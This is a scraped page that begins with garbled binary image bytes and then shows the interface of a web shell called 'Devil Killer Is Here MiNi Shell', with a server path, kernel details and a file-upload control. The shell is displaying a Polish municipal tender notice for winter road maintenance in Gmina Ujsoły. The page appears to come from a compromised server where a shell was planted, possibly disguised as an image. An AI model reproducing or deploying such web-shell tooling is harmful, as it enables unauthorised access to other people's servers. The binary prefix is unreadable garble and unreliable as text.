JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171010/599824-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 599824-N-2017 z dnia 2017-10-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Ujsoły</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zimowe utrzymanie dróg powiatowych na terenie Gminy Ujsoły</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Ujsoły</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">55209900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Gminna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">34371 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Ujsoły</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">0-33 8647350</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ugujsoly@ujsoly.com.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">0-33 8647354</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ujsoly.com.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.bip.ujsoly.com.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty składa się pod rygorem nieważności w formie pisemnej. Składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. poz. 1529 oraz 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Ujsoły, ul. Gminna 1, 34-371 Ujsoły</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zimowe utrzymanie dróg powiatowych na terenie Gminy Ujsoły</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PN/11/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem niniejszego zamówienia jest zimowe utrzymanie drógpowiatowych na terenie Gminy Ujsoły. Zamawiający podzielił zamówienie na 3 następująceczęści: CZĘŚĆ NR 1 Zimowe utrzymanie drogi powiatowej: S-1439 Kamesznica - Milówka -Rajcza - Ujsoły - gr. Państwa na odcinku od granicy z miejscowością Rajcza do granicyPaństwa w m. Glinka. 1. Zakres zamówienia obejmuje zimowe utrzymanie drogi powiatowej S-1439 Kamesznica - Milówka - Rajcza - Ujsoły gr. państwa, na odcinku od granicy zmiejscowością Rajcza do granicy Państwa w m. Glinka Km 0+000 do km 10 + 901 wnastępujących standardach: 1) Odcinek I - długość 3 200 mb - od granicy z gminą Rajcza doskrzyżowania drogi S-1439 z ul. Gminną, gmina Ujsoły, w standardzie III 2) Odcinek II -długość 7 701 mb - od do skrzyżowania drogi S-1439 z ul. Gminną, gmina Ujsoły, do przejściagranicznego w Glince, w standardzie III Dodatkowo w ciągu tej drogi: 3) Pętla autobusowa wGlince - powierzchnia ok. 550 m2 w standardzie III 4) Parking obok przejścia granicznego -powierzchnia ok. 474 m2 w standardzie III Droga utrzymana ,,na czarno". Wytyczne dotyczącestandardu III stanowią załącznik nr 1 do Szczegółowej Specyfikacji Technicznej - StandardyOdśnieżania Dróg Powiatowych. 2. Zamówienie obejmuje: - odśnieżanie drogi na całejszerokości, usuwanie śliskości zimowej drogi przez posypywanie materiałami (piaskiem,kruszywo niesortowane o uziarnieniu do 4 mm, sól drogowa). 3. Średnia prędkość poruszaniasię pługu i piaskarki - 25 km/godzinę. 4. Długość drogi i normatywny czas jednorazowego jejobjazdu (tam i z powrotem) w średnich warunkach zimowych wynosi: Długość drogi w km (tami z powrotem)Normatywny czas (w min.) jednorazowego objazdu 21,802 + pętla autobusowa +parking obok przejścia granicznego 52 30 SUMA 82 Czas odśnieżania przystanku i placuustalony został w oparciu o średni czas odśnieżania tych miejsc w latach ubiegłych. Do realizacjiprzedmiotu umowy Wykonawca powinien zapewnić następujący sprzęt: 1) samochód (ciągnik) zpługiem, 2) samochód (ciągnik) z rozrzutnikiem, ewentualnie samochód (ciągnik) z pługiem irozrzutnikiem, 3) pług wirnikowy. CZĘŚĆ NR 2 Zimowe utrzymanie drogi powiatowej: S- 1442Ujsoły - Soblówka. 1. Zakres zamówienia obejmuje zimowe utrzymanie drogi powiatowej S-1442 Ujsoły - Soblówka, Gm. Ujsoły. km 0+000 do km 04 + 042 w standardzie III. Drogautrzymana ,,na czarno". Dodatkowo w ciągu tej drogi: 1) Parking przy kościele w Soblówce -powierzchnia 600 m2 w standardzie I"" Wytyczne dotyczące standardu III stanowią załącznik nr1 do Szczegółowej Specyfikacji Technicznej - Standardy Odśnieżania Dróg Powiatowych. 2.Zamówienie obejmuje: - odśnieżanie drogi na całej szerokości, usuwanie śliskości zimowej drogiprzez posypywanie materiałami (piaskiem, kruszywo niesortowane o uziarnieniu do 4 mm, sóldrogowa). 3. Średnia prędkość poruszania się pługu i piaskarki - 25 km/godzinę. 4. Długośćdrogi i normatywny czas jednorazowego jej objazdu (tam i z powrotem) w średnich warunkachzimowych wynosi: Długość drogi w km (tam i z powrotem)Normatywny czas (w min.)jednorazowego objazdu 8,084 +Parking przy kościele w Soblówce 26 17 SUMA 43 Czasodśnieżania parkingu ustalony został w oparciu o średni czas odśnieżania tego miejsca latachubiegłych. Do realizacji przedmiotu umowy Wykonawca powinien zapewnić następujący sprzęt:1) samochód (ciągnik) z pługiem, 2) samochód (ciągnik) z rozrzutnikiem, ewentualnie samochód(ciągnik) z pługiem i rozrzutnikiem, 3) pług wirnikowy. CZĘŚĆ NR 3 Zimowe utrzymanie drogipowiatowej: S- 1441 Ujsoły - Złatna. 1. Zakres zamówienia obejmuje zimowe utrzymanie drogipowiatowej S-1441 Ujsoły - Złatna, Gm. Ujsoły. Km 0+000 do km 07 + 200 w standardzieIII. Droga utrzymana ,,na czarno". Dodatkowo w ciągu tej drogi: 1) Przystanek Kuflówka -powierzchnia 214 m2 w standardzie III 2) Plac Złatna Huta - powierzchnia 400 m2 wstandardzie III Wytyczne dotyczące standardu III stanowią załącznik nr 1 do SzczegółowejSpecyfikacji Technicznej - Standardy Odśnieżania Dróg Powiatowych. 2. Zamówienieobejmuje: - odśnieżanie drogi na całej szerokości, usuwanie śliskości zimowej drogi przezposypywanie materiałami (piaskiem, kruszywo niesortowane o uziarnieniu do 4 mm, sóldrogowa). 3. Średnia prędkość poruszania się pługu i piaskarki - 25 km/godzinę. 4. Długośćdrogi i normatywny czas jednorazowego jej objazdu (tam i z powrotem) w średnich warunkachzimowych wynosi: Długość drogi w km (tam i z powrotem)Normatywny czas (w min.)jednorazowego objazdu 14,400 + przystanek Kuflówka + plac Złatna Huta 34 26 SUMA 60Czas odśnieżania przystanku i placu ustalony został w oparciu o średni czas odśnieżania tychmiejsc w latach ubiegłych. Do realizacji przedmiotu umowy Wykonawca powinien zapewnićnastępujący sprzęt: 1) samochód (ciągnik) z pługiem, 2) samochód (ciągnik) z rozrzutnikiem,ewentualnie samochód (ciągnik) z pługiem i rozrzutnikiem, 3) pług wirnikowy. DODATKOWEUSTALENIA 1. Zimowe utrzymanie musi być wykonywane zgodnie z wymogami SST dot.odśnieżania i zwalczania śliskości zimowej, które stanowią załączniki do niniejszej specyfikacji.2. Wykonawca zobowiązany jest do prowadzenia książki raportów dziennych, w którejkażdorazowy wpis musi być potwierdzony przez Koordynatora wyznaczonego przezZamawiającego. 3. Po sezonie zimowym tj. po zakończeniu świadczenia usług związanych zzimowym utrzymaniem dróg wykonawca jest zobowiązany do uprzątnięcia materiałów któresłużyły do posypywania dróg w terminie wskazanym przez zamawiającego. 4. Wykonawca wtrakcie przygotowywania oferty, powinien wziąć pod uwagę, iż na drogach powiatowych mogąwystąpić utrudnienia związane z wykonywaniem robót budowlanych. 5. Zamawiający dowykonania powyższego zamówienia nie wskazuje czynności w zakresie realizacji zamówienia, wstosunku do których wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawieumowy o pracę.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90620000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90630000-2</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-04-30</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-04-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie szczegółowych warunków</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie precyzuje w tym zakresie szczegółowych warunków</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek dotyczący zdolności technicznej zostanie spełniony, jeżeliWykonawca wykaże, że dysponuje następującymi narzędziami i urządzeniami technicznymi: -Samochód (ciągnik) z pługiem - 1 szt. (w przypadku składania oferty dla więcej niż jednej albowszystkich części zamówienia - 2 szt.), - Samochód (ciągnik) z rozrzutnikiem - 1 szt., - Pługwirnikowy - 1 szt.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1. W przypadku uszkodzenia sprzętu zamiennik sprzętowy musi być oidentycznych parametrach (dotyczy wszystkich części). 2. Zamawiający może, na każdym etapiepostępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowaniezasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcymoże mieć negatywny wpływ na realizację zamówienia. 3. Wykonawca może w celu potwierdzeniaspełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu dokonkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych 